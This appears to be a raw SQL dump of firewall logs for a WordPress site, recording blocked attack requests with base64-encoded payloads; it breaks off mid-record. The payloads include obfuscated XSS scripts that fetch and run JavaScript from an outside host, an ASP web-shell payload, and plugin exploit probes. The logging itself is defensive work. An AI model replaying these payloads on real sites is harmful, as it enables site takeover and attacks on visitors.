Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37700,1569411819.582360,1569411818.775700,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php?Action=EWD_UFAQ_UpdateOptions',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhYT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2FhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYSovLDExMi8qKi8sMTE1LypfYWFhYWFhYWFhYWEqLyw1OC8qX2FhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYSovLDQ3LypfYWFhYWFhYWFhYWEqLywxMDMvKl9hYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWFhKi8sOTgvKiovLDEwMS8qX2FhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhKi8sOTgvKl9hYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWFhKi8sMTAxLyoqLywxMTQvKl9hYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYSovLDk5LypfYWFhYWFhYWFhYWEqLywxMTEvKiovLDEwOS8qX2FhYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWFhKi8sMTExLyoqLyw5OS8qX2FhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWEqLyw2Myk7dmFyIF9hYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhYShfYWFhYWFhYWFhYWEpO2lmKF9hYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhKTt9IGZ1bmN0aW9uIF9hYWFhYWFhYWFhYShfYWFhYWFhYWFhYWEpeyB2YXIgX2FhYWFhYWFhYWFhID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2FhYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYWEsIGZhbHNlICk7X2FhYWFhYWFhYWFhLnNlbmQoIG51bGwgKTtyZXR1cm4gX2FhYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWFhKHRvZG8peyB2YXIgX2FhYWFhYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfYWFhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37769,1569949508.381399,1569949506.864300,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=test',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37770,1569949501.024154,1569949499.538100,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=3',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37771,1569949498.149466,1569949496.784000,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=2',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37701,1569411817.309531,1569411816.426100,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?Action=EWD_UFAQ_UpdateOptions',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhYT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2FhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYSovLDExMi8qKi8sMTE1LypfYWFhYWFhYWFhYWEqLyw1OC8qX2FhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYSovLDQ3LypfYWFhYWFhYWFhYWEqLywxMDMvKl9hYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWFhKi8sOTgvKiovLDEwMS8qX2FhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhKi8sOTgvKl9hYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWFhKi8sMTAxLyoqLywxMTQvKl9hYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYSovLDk5LypfYWFhYWFhYWFhYWEqLywxMTEvKiovLDEwOS8qX2FhYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWFhKi8sMTExLyoqLyw5OS8qX2FhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWEqLyw2Myk7dmFyIF9hYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhYShfYWFhYWFhYWFhYWEpO2lmKF9hYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhKTt9IGZ1bmN0aW9uIF9hYWFhYWFhYWFhYShfYWFhYWFhYWFhYWEpeyB2YXIgX2FhYWFhYWFhYWFhID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2FhYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYWEsIGZhbHNlICk7X2FhYWFhYWFhYWFhLnNlbmQoIG51bGwgKTtyZXR1cm4gX2FhYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWFhKHRvZG8peyB2YXIgX2FhYWFhYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfYWFhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37772,1569949491.613449,1569949489.905300,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=1',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37773,1569949488.599929,1569949487.266300,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=test',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37774,1569949485.974381,1569949484.732800,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?page=yuzo-related-post',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Related Posts <= 5.12.90 - Missing Authentication','{\"learningMode\":0,\"failedRules\":\"137\",\"paramKey\":\"cmVxdWVzdC5ib2R5W25hbWVfb3B0aW9uc10=\",\"paramValue\":\"eXV6b19yZWxhdGVkX3Bvc3Q=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(37902,1570674368.802732,1570674367.816400,'\0\0\0\0\0\0\0\0\0\0ÿÿ·ž„',0,403,0,0,0,'http://bintara.com.my//fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media','http://bintara.com.my//fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36','blocked:waf','Malicious File Upload','{\"learningMode\":0,\"failedRules\":\"11\",\"paramKey\":\"cmVxdWVzdC5maWxlTmFtZXNbTmV3RmlsZV0=\",\"paramValue\":\"eC5hc3B4\",\"path\":\"Ly9mY2tlZGl0b3IvZWRpdG9yL2ZpbGVtYW5hZ2VyL3VwbG9hZC9hc3B4L3VwbG9hZC5hc3B4\",\"category\":\"file_upload\",\"ssl\":0}'),(37853,1569949986.947222,1569949985.547500,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhPVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhKi8sMTEyLyoqLywxMTUvKl9hYWFhYWFhYWFhKi8sNTgvKl9hYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhKi8sMTAzLypfYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWEqLyw5OC8qKi8sMTAxLypfYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWEqLyw5OC8qX2FhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWEqLywxMDEvKiovLDExNC8qX2FhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhKi8sOTkvKl9hYWFhYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWEqLywxMTEvKiovLDk5LypfYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhYSovLDQ2LypfYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhKi8sNjMpO3ZhciBfYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhKF9hYWFhYWFhYWFhKTtpZihfYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYShfYWFhYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYWFhYShfYWFhYWFhYWFhYSl7IHZhciBfYWFhYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYSwgZmFsc2UgKTtfYWFhYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWEodG9kbyl7IHZhciBfYWFhYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37918,1570674536.319336,1570674535.126800,'\0\0\0\0\0\0\0\0\0\0ÿÿ·ž„',0,403,0,0,0,'http://bintara.com.my//images/Sql.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3JtYl0=\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9pbWFnZXMvU3FsLmFzcA==\",\"category\":\"sqli\",\"ssl\":0}'),(37854,1569949984.640816,1569949983.482200,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?action=save&updated=true',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhYWFhYWFhPVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfYWFhYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTEyLyoqLywxMTUvKl9hYWFhYWFhYWFhYWFhYWFhKi8sNTgvKl9hYWFhYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTAzLypfYWFhYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhYWEqLyw5OC8qKi8sMTAxLypfYWFhYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWFhYWEqLyw5OC8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMDEvKiovLDExNC8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhYWFhKi8sOTkvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTEvKiovLDk5LypfYWFhYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhYWFhYWFhYSovLDQ2LypfYWFhYWFhYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYWFhYWFhKi8sNjMpO3ZhciBfYWFhYWFhYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhYWFhKTtpZihfYWFhYWFhYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWFhYSl7IHZhciBfYWFhYWFhYWFhYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYWFhYWFhYSwgZmFsc2UgKTtfYWFhYWFhYWFhYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWFhYWFhYWEodG9kbyl7IHZhciBfYWFhYWFhYWFhYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWFhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37775,1569949752.966671,1569949749.805300,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3RoaW1fdmFsdWVd\",\"paramValue\":\"WDwvc2NyaXB0PjxzY3JpcHQgICB0eXBlPXRleHQvamF2YXNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PnZhciBjID0gMDt2YXIgX2FhYWFhYWFhYWFhYWFhYT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2FhYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWFhYSovLDExMi8qKi8sMTE1LypfYWFhYWFhYWFhYWFhYWFhKi8sNTgvKl9hYWFhYWFhYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYWFhYWFhYSovLDQ3LypfYWFhYWFhYWFhYWFhYWFhKi8sMTAzLypfYWFhYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTUvKiovLDQ2LypfYWFhYWFhYWFhYWFhYWFhKi8sOTgvKiovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhYWFhYWFhKi8sOTgvKl9hYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTkvKiovLDk3LypfYWFhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWFhKi8sMTA0LypfYWFhYWFhYWFhYWFhYWFhKi8sMTAxLyoqLywxMTQvKl9hYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhYSovLDk5LypfYWFhYWFhYWFhYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhYWFhYWFhYWEqLyw0Ny8qKi8sMTA4LypfYWFhYWFhYWFhYWFhYWFhKi8sMTExLyoqLyw5OS8qX2FhYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYWFhKi8sMTA4LyoqLyw0Ny8qKi8sOTkvKl9hYWFhYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWFhYSovLDQ2LypfYWFhYWFhYWFhYWFhYWFhKi8sMTA2LypfYWFhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWFhKi8sNjM